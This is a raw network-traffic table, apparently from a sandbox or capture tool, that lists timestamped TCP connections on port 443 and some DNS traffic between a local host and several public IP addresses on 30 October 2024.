                                                Oct 30, 2024 00:22:21.664674044 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.664726973 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.664731979 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.665863991 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.665925980 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.666083097 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.666095972 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.707736015 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:21.707772970 CET44361352104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:21.707844973 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:21.708862066 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:21.708874941 CET44361352104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:21.742939949 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.742976904 CET44361353172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.743072033 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.743428946 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.743443966 CET44361353172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.747847080 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.747944117 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.747997999 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.749880075 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.749897003 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.871032953 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.871129036 CET44361354172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.871284962 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.879681110 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.879714012 CET44361354172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.312225103 CET44361352104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.312655926 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.312684059 CET44361352104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.314344883 CET44361352104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.314416885 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.314735889 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.314747095 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.314829111 CET44361352104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.314840078 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.314887047 CET61352443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.315273046 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.315373898 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.315458059 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.315649986 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.315685034 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.356499910 CET44361353172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.356801033 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.356834888 CET44361353172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.357727051 CET44361353172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.357904911 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358109951 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358124018 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358171940 CET44361353172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.358217001 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358231068 CET44361353172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.358241081 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358283997 CET61353443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358663082 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358697891 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.358768940 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358954906 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.358968019 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.479038954 CET44361354172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.479348898 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.479430914 CET44361354172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.480441093 CET44361354172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.480524063 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.480886936 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.480932951 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.480956078 CET44361354172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.480966091 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.481004000 CET61354443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.481318951 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.481381893 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.481445074 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.481628895 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.481647968 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.963745117 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.965697050 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.965732098 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.965848923 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.966753960 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.966814041 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.969203949 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.969269037 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.970109940 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.970129013 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.970248938 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.970259905 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.970354080 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.970370054 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:22.970419884 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:22.971576929 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.971666098 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.971913099 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.971971035 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:22.972019911 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:22.972027063 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.023514986 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.092653990 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:23.092931986 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:23.092942953 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:23.093991995 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:23.094053984 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:23.094377995 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:23.094443083 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:23.119473934 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119525909 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119570017 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119599104 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.119606972 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119628906 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119657993 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.119678974 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119716883 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119726896 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.119734049 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119786024 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.119827032 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.120325089 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.120964050 CET61355443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.120981932 CET44361355104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.148538113 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:23.148550034 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:23.195477962 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:23.222022057 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:23.222109079 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:23.222160101 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:23.222732067 CET61356443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:23.222754955 CET44361356172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:23.225852013 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.225894928 CET44361359104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.225959063 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.226281881 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.226300955 CET44361359104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.834773064 CET44361359104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.835172892 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.835200071 CET44361359104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.836628914 CET44361359104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.836718082 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.837024927 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.837042093 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.837095976 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.837104082 CET44361359104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.837152958 CET61359443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.837492943 CET61360443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.837534904 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:23.837605000 CET61360443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.837814093 CET61360443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:23.837831020 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:24.472312927 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:24.472662926 CET61360443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:24.472713947 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:24.473189116 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:24.473470926 CET61360443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:24.473561049 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:24.473644018 CET61360443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:24.515330076 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:24.620045900 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:24.620194912 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:24.620275021 CET61360443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:24.620898008 CET61360443192.168.2.4104.21.63.172
                                                Oct 30, 2024 00:22:24.620938063 CET44361360104.21.63.172192.168.2.4
                                                Oct 30, 2024 00:22:31.471232891 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:31.471323013 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:31.471369982 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:32.066301107 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:32.066349983 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:35.719821930 CET5805853192.168.2.4162.159.36.2
                                                Oct 30, 2024 00:22:35.725246906 CET5358058162.159.36.2192.168.2.4
                                                Oct 30, 2024 00:22:35.725341082 CET5805853192.168.2.4162.159.36.2
                                                Oct 30, 2024 00:22:35.730846882 CET5358058162.159.36.2192.168.2.4
                                                Oct 30, 2024 00:22:36.324011087 CET5805853192.168.2.4162.159.36.2
                                                Oct 30, 2024 00:22:36.331309080 CET5358058162.159.36.2192.168.2.4
                                                Oct 30, 2024 00:22:36.331378937 CET5805853192.168.2.4162.159.36.2
                                                Oct 30, 2024 00:22:36.409540892 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:36.409590960 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:36.409663916 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:36.410052061 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:36.410069942 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.523262978 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.523371935 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.528525114 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.528557062 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.528810024 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.539063931 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.583327055 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.913180113 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.913204908 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.913218975 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.913264036 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.913292885 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.913333893 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.915424109 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.915457964 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.915487051 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.915498972 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.915517092 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.918981075 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.919003010 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.919015884 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.919157982 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.919193983 CET443580604.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:37.919230938 CET58060443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:37.968336105 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:37.968404055 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:37.968466043 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:38.603827953 CET61357443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:38.603863955 CET44361357172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:46.151923895 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:46.151983023 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:46.152065039 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:46.152333021 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:46.152369022 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:46.883699894 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:46.883822918 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:46.885540962 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:46.885576010 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:46.885804892 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:46.895919085 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:46.939369917 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.138256073 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.138276100 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.138303995 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.138370991 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.138401031 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.138432980 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.138453960 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.140449047 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.140466928 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.140537977 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.140553951 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.140611887 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.255511045 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.255530119 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.255645990 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.255666971 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.255723000 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.257703066 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.257719040 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.257792950 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.257806063 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.257858992 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.259449005 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.259464979 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.259524107 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.259536982 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.259601116 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.261149883 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.261167049 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.261234999 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.261246920 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.261296988 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.373095036 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.373112917 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.373270035 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.373284101 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.373339891 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.374123096 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.374144077 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.374223948 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.374236107 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.374285936 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.375335932 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.375355005 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.375442028 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.375454903 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.375509977 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.376275063 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.376291037 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.376362085 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.376374006 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.376426935 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.377293110 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.377309084 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.377403021 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.377414942 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.377465963 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.379760981 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.379776955 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.379852057 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.379863977 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.379913092 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.489676952 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.489697933 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.489722967 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.489777088 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.489917994 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.490158081 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.490192890 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.490216970 CET58061443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.490236044 CET4435806113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.532453060 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.532458067 CET58063443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.532486916 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.532519102 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.532598972 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.533291101 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.533296108 CET58063443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.533302069 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.533399105 CET58063443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.533426046 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.534064054 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.534151077 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.534219027 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.534324884 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.534359932 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.535268068 CET58065443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.535305977 CET4435806513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.535361052 CET58065443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.535855055 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.535882950 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.535938025 CET58065443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.535938978 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.535952091 CET4435806513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:47.536021948 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:47.536046028 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.274266958 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.274966002 CET58063443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.275007010 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.275285006 CET4435806513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.275520086 CET58063443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.275538921 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.275676012 CET58065443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.275732994 CET4435806513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.276339054 CET58065443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.276351929 CET4435806513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.284698009 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.285034895 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.285087109 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.285378933 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.285393953 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.296546936 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.297013044 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.297032118 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.297514915 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.297524929 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.403215885 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.403501987 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.403589964 CET58063443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.403759956 CET58063443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.403790951 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.403815031 CET58063443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.403829098 CET4435806313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.407514095 CET58067443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.407565117 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.407671928 CET58067443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.407887936 CET58067443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.407907963 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.408718109 CET4435806513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.408787966 CET4435806513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.408837080 CET58065443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.408905029 CET58065443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.408919096 CET4435806513.107.246.60192.168.2.4
